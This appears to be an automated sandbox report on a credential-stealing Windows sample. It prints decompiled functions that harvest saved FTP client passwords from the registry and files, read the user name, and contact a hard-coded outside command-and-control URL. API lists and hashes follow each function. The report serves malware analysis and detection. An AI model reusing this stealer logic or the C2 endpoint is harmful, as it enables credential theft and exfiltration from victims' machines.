                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmplstrcmpi
                                                                        • String ID: logins$table
                                                                        • API String ID: 3524194181-3800951466
                                                                        • Opcode ID: 8d40306bce2371030e01591ff81e34dc71d5cc82bd418bb0d145ecbc17cbc88a
                                                                        • Instruction ID: 24804250fb1ea017375bfa21efe0a860dce1abc885f05977de560fb28726df4f
                                                                        • Opcode Fuzzy Hash: 8d40306bce2371030e01591ff81e34dc71d5cc82bd418bb0d145ecbc17cbc88a
                                                                        • Instruction Fuzzy Hash: 2A31467281024EFAEF219FD0CC45EEEBB78EF15324F104276E520B11E1D3789A949B88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E00401BAA(void* _a4, char* _a8, char* _a12, int** _a16, intOrPtr _a20) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				int** _t28;
                                                                        				long _t30;
                                                                        				char* _t33;
                                                                        				void* _t36;
                                                                        				long _t39;
                                                                        				long _t46;
                                                                        				signed int _t51;
                                                                        				char* _t53;
                                                                        
                                                                        				_t28 = _a16;
                                                                        				if(_t28 != 0) {
                                                                        					 *_t28 = 0;
                                                                        				}
                                                                        				_t53 = 0;
                                                                        				if(_a20 != 1) {
                                                                        					if(_a20 != 2) {
                                                                        						_t51 = 0;
                                                                        					} else {
                                                                        						_t51 = 0x100;
                                                                        					}
                                                                        				} else {
                                                                        					_t51 = 0x200;
                                                                        				}
                                                                        				_t30 = RegOpenKeyExA(_a4, _a8, 0, _t51 | 0x00020019,  &_v8); // executed
                                                                        				if(_t30 == 0) {
                                                                        					_t39 = RegQueryValueExA(_v8, _a12, 0,  &_v16, 0,  &_v12); // executed
                                                                        					if(_t39 == 0 && _v12 != 0 && (_v16 != 1 || _v12 != 1)) {
                                                                        						_t53 = E004017EC(_v12 + 1);
                                                                        						_t46 = RegQueryValueExA(_v8, _a12, 0, 0, _t53,  &_v12); // executed
                                                                        						if(_t46 == 0) {
                                                                        							if(_a16 != 0) {
                                                                        								_push(_v12);
                                                                        								_pop( *__eax);
                                                                        							}
                                                                        						} else {
                                                                        							E004017D5(_t53);
                                                                        							_t53 = 0;
                                                                        						}
                                                                        					}
                                                                        					RegCloseKey(_v8); // executed
                                                                        				}
                                                                        				_t33 = _t53;
                                                                        				if(_t33 != 0 || _a20 >= 2) {
                                                                        					return _t33;
                                                                        				} else {
                                                                        					_t36 = E00401BAA(_a4, _a8, _a12, _a16, _a20 + 1); // executed
                                                                        					return _t36;
                                                                        				}
                                                                        			}















                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401BEF
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401C0A
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401C40
                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401C62
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: QueryValue$CloseOpen
                                                                        • String ID:
                                                                        • API String ID: 1586453840-0
                                                                        • Opcode ID: ab99b87888c9aafd431060d37af3ad9a4d5d0217319c08ebbc5b5242cc0110ac
                                                                        • Instruction ID: 6d9cc93ce3cdeedd4ff0784c2595653c4496094a9b1daf344de8f42f3f4a3d5e
                                                                        • Opcode Fuzzy Hash: ab99b87888c9aafd431060d37af3ad9a4d5d0217319c08ebbc5b5242cc0110ac
                                                                        • Instruction Fuzzy Hash: B5217132600108FFEF119E90CD42BEE3BBAEB40344F10403AF511A61B1E779DA91DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00406DE7(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				char* _v24;
                                                                        				char* _v28;
                                                                        				void* _t19;
                                                                        				void* _t20;
                                                                        				intOrPtr* _t23;
                                                                        				intOrPtr* _t27;
                                                                        				intOrPtr* _t30;
                                                                        				char* _t32;
                                                                        				void* _t38;
                                                                        				char _t40;
                                                                        				char* _t41;
                                                                        
                                                                        				_t38 = __ecx;
                                                                        				_t19 = E00401E53(_a8); // executed
                                                                        				_t20 = _t19;
                                                                        				if(_t20 != 0) {
                                                                        					_t23 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        					__eflags = _t23;
                                                                        					if(_t23 != 0) {
                                                                        						_v24 = E004017EC(_v8);
                                                                        						E00401823(_v12, _v24, _v8);
                                                                        						_t41 = _v24;
                                                                        						while(1) {
                                                                        							__eflags =  *_t41;
                                                                        							if( *_t41 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t27 = StrStrIA(_t41, "\"password\" : \"");
                                                                        							__eflags = _t27;
                                                                        							if(_t27 != 0) {
                                                                        								_t41 = _t27 + lstrlenA("\"password\" : \"");
                                                                        								_v28 = _t41;
                                                                        								_t30 = StrStrIA(_t41, "\",");
                                                                        								__eflags = _t30;
                                                                        								if(__eflags != 0) {
                                                                        									 *_t30 = 0;
                                                                        									_push( *_t30);
                                                                        									E00406D6F(_t38, __eflags, _a4, _v28);
                                                                        									_pop(_t40);
                                                                        									_t32 = _t30;
                                                                        									 *_t32 = _t40;
                                                                        									continue;
                                                                        								}
                                                                        								break;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						E00401486(_a4, 0xbeef1001);
                                                                        						E004014BC(_a4, _v24, _v8);
                                                                        						E004017D5(_v24);
                                                                        						return E00401FB0( &_v20);
                                                                        					}
                                                                        					return _t23;
                                                                        				} else {
                                                                        					return _t20;
                                                                        				}
                                                                        			}


















                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "password" : "
                                                                        • API String ID: 0-2310853927
                                                                        • Opcode ID: 5b68fb03cdf083ea57db854297a0cadf2f38fa05e3e79aaf6980040a0e154af2
                                                                        • Instruction ID: 9cc4e85d6de1a42ee7ad07191c646accbbd50fe48afa7da354d9bcd9ed2f16a6
                                                                        • Opcode Fuzzy Hash: 5b68fb03cdf083ea57db854297a0cadf2f38fa05e3e79aaf6980040a0e154af2
                                                                        • Instruction Fuzzy Hash: 4D218136800209BECF12ABA1CC02EEE7E75AF60354F154177F802B51B1D77D4E619B99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004011D5(signed int __eax, signed int __edx, CHAR* _a4, intOrPtr _a8) {
                                                                        				void* _v8;
                                                                        				long _v12;
                                                                        				void _v4108;
                                                                        				void* _t14;
                                                                        				void* _t15;
                                                                        				int _t18;
                                                                        				signed int _t28;
                                                                        
                                                                        				_t28 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
                                                                        				_t14 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
                                                                        				_v8 = _t14;
                                                                        				_t15 = _t14 + 1;
                                                                        				if(_t15 != 0) {
                                                                        					while(1) {
                                                                        						_t18 = ReadFile(_v8,  &_v4108, 0x1000,  &_v12, 0); // executed
                                                                        						if(_t18 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						E0040115C( &_v4108, _t28, _a8,  &_v4108, _v12); // executed
                                                                        						if(_v12 != 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							CloseHandle(_v8);
                                                                        							return 1;
                                                                        						}
                                                                        						goto L6;
                                                                        					}
                                                                        					CloseHandle(_v8);
                                                                        					return 0;
                                                                        				} else {
                                                                        					return _t15;
                                                                        				}
                                                                        				L6:
                                                                        			}











                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,004027C1,00000000,00000000,00000000,?,?,?,00000000), ref: 004011F6
                                                                        • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,004027C1,00000000,00000000), ref: 0040121A
                                                                        • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,004027C1,00000000), ref: 00401226
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleRead
                                                                        • String ID:
                                                                        • API String ID: 1035965006-0
                                                                        • Opcode ID: 3ae2a460d1a6398647d0a0714ade2b014be269c296f1c7f65f76ee4d7157fb81
                                                                        • Instruction ID: d891ca6dc5143c7d33845585369107a0d95fb6be188be00085997746f24086b0
                                                                        • Opcode Fuzzy Hash: 3ae2a460d1a6398647d0a0714ade2b014be269c296f1c7f65f76ee4d7157fb81
                                                                        • Instruction Fuzzy Hash: C2018131A40108BAEF22EA61CC03FDE7679AB14349F1081B6B540F50E1F6F89BD49B98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0040D330(intOrPtr _a4, intOrPtr _a8) {
                                                                        				char _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v32;
                                                                        				intOrPtr* _t16;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t22;
                                                                        				void* _t26;
                                                                        
                                                                        				_t16 = E00401C8E(_a8, "SOFTWARE\\Robo-FTP 3.7\\Scripts", "FTP Count",  &_v8); // executed
                                                                        				_t17 = _t16;
                                                                        				if(_t17 != 0) {
                                                                        					_push(_t17);
                                                                        					if(_v8 != 4) {
                                                                        						L9:
                                                                        						return E004017D5();
                                                                        					}
                                                                        					 *_t4 =  *_t17;
                                                                        					if(_v12 > 0x1f4) {
                                                                        						_v12 = 0x1f4;
                                                                        					}
                                                                        					while(_v12 != 0) {
                                                                        						wsprintfA( &_v32, "FTP File%d", _v12);
                                                                        						_t26 = _t26 + 0xc;
                                                                        						_t22 = E00401C8E(_a8, "SOFTWARE\\Robo-FTP 3.7\\Scripts",  &_v32, 0);
                                                                        						_t23 = _t22;
                                                                        						if(_t22 != 0) {
                                                                        							E00403E4C(_a4, _t23, 0xbeef0001);
                                                                        							E004017D5(_t23);
                                                                        						}
                                                                        						_v12 = _v12 - 1;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				return _t17;
                                                                        			}











                                                                        APIs
                                                                        • wsprintfA.USER32 ref: 0040D37A
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocalwsprintf
                                                                        • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                                                                        • API String ID: 988369812-376751567
                                                                        • Opcode ID: 632a32571c90a33c2eca92b55cf26a6d800d2a0c6ce34a5ca6cd22ada843cffb
                                                                        • Instruction ID: 20435d818a537ba36105be44c8c75927b15d0ac77e29042cca7cc8f591fb12c9
                                                                        • Opcode Fuzzy Hash: 632a32571c90a33c2eca92b55cf26a6d800d2a0c6ce34a5ca6cd22ada843cffb
                                                                        • Instruction Fuzzy Hash: 1B017C75E40108FEEF00ABD0CC42EEEBA79AB00314F108037B810B21D1D77D8A999A5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00410B60(signed int __eax, void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
                                                                        				long _v8;
                                                                        				void* _t8;
                                                                        				void* _t9;
                                                                        				int _t13;
                                                                        				signed int _t24;
                                                                        
                                                                        				_t24 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
                                                                        				_push(0); // executed
                                                                        				L00410DD6(); // executed
                                                                        				_t8 = E00402AF8(E00410331(E0040244F(), _t24), _t24); // executed
                                                                        				_t9 = E00402B27(_t8, _t24); // executed
                                                                        				_t10 = _t9;
                                                                        				if(_t9 != 0 && E00402C05(_t10, _t24, _a4) != 0) {
                                                                        					 *0x414616 = 1;
                                                                        				}
                                                                        				 *0x417695 = E004017EC(0x101);
                                                                        				_v8 = 0x101;
                                                                        				_t13 = GetUserNameA( *0x417695,  &_v8); // executed
                                                                        				if(_t13 == 0) {
                                                                        					E004017D5( *0x417695);
                                                                        					 *0x417695 = 0; // executed
                                                                        				}
                                                                        				E00401FD8(_t24); // executed
                                                                        				return E0041038A(E00401CBA(), _t24, "Oguqcogtkec");
                                                                        			}









                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 00410B6E
                                                                        • GetUserNameA.ADVAPI32(00000101,00000101), ref: 00410BC1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InitializeNameUser
                                                                        • String ID: Oguqcogtkec
                                                                        • API String ID: 2272643758-3284314360
                                                                        • Opcode ID: fca58cfdc3c7b01d0fe083cd0c9ee51238c257130a43fea9f7abb90a3e26fcd1
                                                                        • Instruction ID: 4cd0992862414466d0513175d6398bc8650a8c005d487a3a8098377ca90b23e8
                                                                        • Opcode Fuzzy Hash: fca58cfdc3c7b01d0fe083cd0c9ee51238c257130a43fea9f7abb90a3e26fcd1
                                                                        • Instruction Fuzzy Hash: B5F08C71608508AAE740FBB7DC03BCA35A26B4035CF00803BB418A91E3DEFC99C0966D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004105CE(signed int __eax, void* __ecx, signed int __edx, void* __eflags) {
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char* _v28;
                                                                        				char* _v32;
                                                                        				void* _t28;
                                                                        				char* _t34;
                                                                        				char* _t36;
                                                                        				char* _t39;
                                                                        				void* _t41;
                                                                        				signed int _t44;
                                                                        				char* _t45;
                                                                        
                                                                        				_t41 = __ecx;
                                                                        				_t44 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
                                                                        				_t39 = 0; // executed
                                                                        				E00403DDB(); // executed
                                                                        				_v24 = 0;
                                                                        				_t28 = E00401000( &_v24, _t44,  &_v24);
                                                                        				if(_v24 == 0) {
                                                                        					_t28 = E00401000( &_v24, _t44,  &_v24);
                                                                        					if(_v24 == 0) {
                                                                        						_t28 = E00401000( &_v24, _t44,  &_v24);
                                                                        					}
                                                                        				}
                                                                        				_t49 = _v24;
                                                                        				if(_v24 == 0) {
                                                                        					L23:
                                                                        					E00401019(_t28, _t44, _v24);
                                                                        					return _t39;
                                                                        				}
                                                                        				_t28 = E00410598( &_v20, _t44, _t49, _v24,  &_v20); // executed
                                                                        				if(_t28 == 1) {
                                                                        					_t45 = "http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php";
                                                                        					while( *_t45 != 0) {
                                                                        						_t39 = _t39;
                                                                        						if(_t39 == 0) {
                                                                        							_v32 = 0xa;
                                                                        							while(1) {
                                                                        								_v28 = 0;
                                                                        								_t34 = E00403D77(_t45, _v24,  &_v28);
                                                                        								_t35 = _t34;
                                                                        								__eflags = _t34;
                                                                        								if(_t34 != 0) {
                                                                        									__eflags = _v28;
                                                                        									if(_v28 != 0) {
                                                                        										_t39 = _t35;
                                                                        										__eflags = _t39;
                                                                        										if(_t39 == 0) {
                                                                        											_t36 = E00401ADD(_t41, _t44, _v28);
                                                                        											_t35 = _t36;
                                                                        											__eflags = _t36;
                                                                        											if(_t36 != 0) {
                                                                        												_t39 = _t35;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								_t28 = E00401019(_t35, _t44, _v28);
                                                                        								_t39 = _t39;
                                                                        								__eflags = _t39;
                                                                        								if(_t39 != 0) {
                                                                        									break;
                                                                        								}
                                                                        								__eflags = _v32;
                                                                        								if(_v32 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								_v32 = _v32 - 1;
                                                                        								Sleep(0x1388);
                                                                        							}
                                                                        							while(1) {
                                                                        								__eflags =  *_t45;
                                                                        								if( *_t45 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								_t45 =  &(_t45[1]);
                                                                        								__eflags = _t45;
                                                                        							}
                                                                        							_t45 =  &(_t45[1]);
                                                                        							__eflags = _t45;
                                                                        							continue;
                                                                        						}
                                                                        						break;
                                                                        					}
                                                                        					_t39 = _t39;
                                                                        					if(_t39 != 0) {
                                                                        						_t28 = E0040260B("Client Hash",  &_v20, 0x10);
                                                                        					}
                                                                        				}
                                                                        			}















                                                                        APIs
                                                                          • Part of subcall function 00403DDB: WSAStartup.WSOCK32(00000101,?,?,004105E3), ref: 00403DF0
                                                                          • Part of subcall function 00401000: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010
                                                                        • Sleep.KERNEL32(00001388,00000000,http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php,00000000,00000000,00000000,?,00000000), ref: 0041069A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateGlobalSleepStartupStream
                                                                        • String ID: Client Hash$http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php
                                                                        • API String ID: 2508568950-3662113661
                                                                        • Opcode ID: 573a32c3c9fe6aa8705be14ea68041b733c3ae1353200457669749f91b1b2d53
                                                                        • Instruction ID: cb183f18291e62fb3d84bfda98949270a7e3c9ace301d4c5e7352435445e4723
                                                                        • Opcode Fuzzy Hash: 573a32c3c9fe6aa8705be14ea68041b733c3ae1353200457669749f91b1b2d53
                                                                        • Instruction Fuzzy Hash: 78315071A0020ADADF21ABE1CD867FF7678AB80308F14443BF140B1191D7FD49E69B5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00409CF4(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				void* _t8;
                                                                        				char* _t11;
                                                                        				void* _t21;
                                                                        				char* _t22;
                                                                        				char* _t23;
                                                                        
                                                                        				_t21 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x2a, 0);
                                                                        				_t8 = E00401DCE(__eflags, 0); // executed
                                                                        				_t9 = _t8;
                                                                        				if(_t8 != 0) {
                                                                        					E00404131(_a4, _t9, "SiteInfo.QFP", 0xbeef0000); // executed
                                                                        					E004017D5(_t9);
                                                                        				}
                                                                        				_t23 =  *0x414082; // 0x0
                                                                        				_t22 =  *0x414086; // 0x0
                                                                        				if( *_t22 != 0) {
                                                                        					do {
                                                                        						_t11 = StrStrIA(_t22, "Odin");
                                                                        						_t27 = _t11;
                                                                        						if(_t11 != 0) {
                                                                        							E00404131(_a4, E0040234A(_t27, _t23), "SiteInfo.QFP", 0xbeef0000);
                                                                        							E004017D5(_t14);
                                                                        						}
                                                                        						while( *_t23 != 0) {
                                                                        							_t23 = _t23 + 1;
                                                                        							__eflags = _t23;
                                                                        						}
                                                                        						_t23 = _t23 + 1;
                                                                        						asm("cld");
                                                                        						asm("repne scasb");
                                                                        						_t29 =  *_t22;
                                                                        					} while ( *_t22 != 0);
                                                                        				}
                                                                        				return E00401553(_t21, _t29, _a4, _v8);
                                                                        			}










                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,Odin), ref: 00409D46
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocal
                                                                        • String ID: Odin$SiteInfo.QFP
                                                                        • API String ID: 2826327444-4277389770
                                                                        • Opcode ID: 486d78c053051990349350fdd91b5bb596df03b5f066a6875e7bab6376395dd3
                                                                        • Instruction ID: 79767c209d95ddd877970eb40065194a0b0cfa7ade53a59ec305b62fc9be4706
                                                                        • Opcode Fuzzy Hash: 486d78c053051990349350fdd91b5bb596df03b5f066a6875e7bab6376395dd3
                                                                        • Instruction Fuzzy Hash: FF01F9B0590509BAEB112B628C02FAF7E69DFD0324F24013BF945B51E3E67C5E81C6AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004073FE(intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				char _v2072;
                                                                        				long _t24;
                                                                        				long _t25;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t24 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t25 = _t24;
                                                                        				if(_t25 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t32 = E00401C8E(_a8, _a12,  &_v2064,  &_v2072);
                                                                        						_v2068 = _t32;
                                                                        						if(_t32 != 0 && _v2072 != 0) {
                                                                        							E00403DF7(_a4, _v2068, _v2072, 0xbeef0000);
                                                                        						}
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t25;
                                                                        			}













                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407411
                                                                        • RegEnumValueA.ADVAPI32 ref: 00407445
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004074A8
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpenValue
                                                                        • String ID:
                                                                        • API String ID: 4012628704-0
                                                                        • Opcode ID: 4f5a2dbe14de2fb53bb9454d8bfbf7431c0efea47777903af28ee8858ffe2408
                                                                        • Instruction ID: 225cf3d4d1326567d8f11672761244bf4029b44a97f31c33bb7786e48f251d91
                                                                        • Opcode Fuzzy Hash: 4f5a2dbe14de2fb53bb9454d8bfbf7431c0efea47777903af28ee8858ffe2408
                                                                        • Instruction Fuzzy Hash: 8F111C7290410CBADF219F90CC42BDDBBB9BF04304F14C0B6B614B51A1DB79ABA59F99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040F439(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, CHAR* _a16) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				long _t22;
                                                                        				long _t23;
                                                                        				void* _t35;
                                                                        
                                                                        				_t35 = __ecx;
                                                                        				_t22 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t23 = _t22;
                                                                        				if(_t23 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D69(E00401D69(E00401D15(_a12, "\\"),  &_v2064), _a16);
                                                                        						E0040F39C(_t35, _a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t23;
                                                                        			}












                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F44C
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040F480
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F4DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1332880857-0
                                                                        • Opcode ID: aa8a74240db538a80540b88ad57e6850934c841f64fe9afdf995eb129e139c62
                                                                        • Instruction ID: 735606c21c6a6d191ae9bd649b31301a7bdc0d160cf88c939fc3181304d95fd7
                                                                        • Opcode Fuzzy Hash: aa8a74240db538a80540b88ad57e6850934c841f64fe9afdf995eb129e139c62
                                                                        • Instruction Fuzzy Hash: 9411127590010CBADF21AFA1CC02FEE7B79BF04304F1080B6BA15B55E1DB79AA959F58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040F39C(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				long _t21;
                                                                        				long _t22;
                                                                        				void* _t33;
                                                                        
                                                                        				_t33 = __ecx;
                                                                        				_t21 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t22 = _t21;
                                                                        				if(_t22 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D69(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E0040F207(_t33, _a4, _a8, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t22;
                                                                        			}












                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F3AF
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040F3DF
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F430
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1332880857-0
                                                                        • Opcode ID: 998927d36561a2003baa7c702cc51bfb4aaa151aaf9bee54d6bd3a387bdb2818
                                                                        • Instruction ID: ef60cf3e78cb170a6f642b347f899af58aef4bd76c3f3cdf9285c2581eedf16e
                                                                        • Opcode Fuzzy Hash: 998927d36561a2003baa7c702cc51bfb4aaa151aaf9bee54d6bd3a387bdb2818
                                                                        • Instruction Fuzzy Hash: 5F01217690010CBADF21AF91CC42FEE7B79BF04304F1080B6BA14B51E1DB79AA959F58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040CBD9(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char* _v12;
                                                                        				char* _t11;
                                                                        				char* _t12;
                                                                        				char* _t14;
                                                                        				void* _t20;
                                                                        				void* _t21;
                                                                        
                                                                        				_t21 = __edx;
                                                                        				_t20 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x43, 0);
                                                                        				_t11 = E00401C8E(0x80000002, "SOFTWARE\\Classes\\TypeLib\\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\\1.2\\0\\win32", 0, 0); // executed
                                                                        				_t12 = _t11;
                                                                        				if(_t12 != 0) {
                                                                        					_v12 = _t12;
                                                                        					_t14 = StrStrIA(_v12, "EasyFTP");
                                                                        					_t23 = _t14;
                                                                        					if(_t14 != 0) {
                                                                        						E00403F86(_t20, _a4, E0040234A(_t23, _v12), 0, 0xbeef0000, E0040CB8D);
                                                                        						E004017D5(_t17);
                                                                        					}
                                                                        					E004017D5(_v12);
                                                                        				}
                                                                        				return E00401553(_t21, _t23, _a4, _v8);
                                                                        			}











                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(?,EasyFTP,80000002,SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32,00000000,00000000), ref: 0040CC10
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
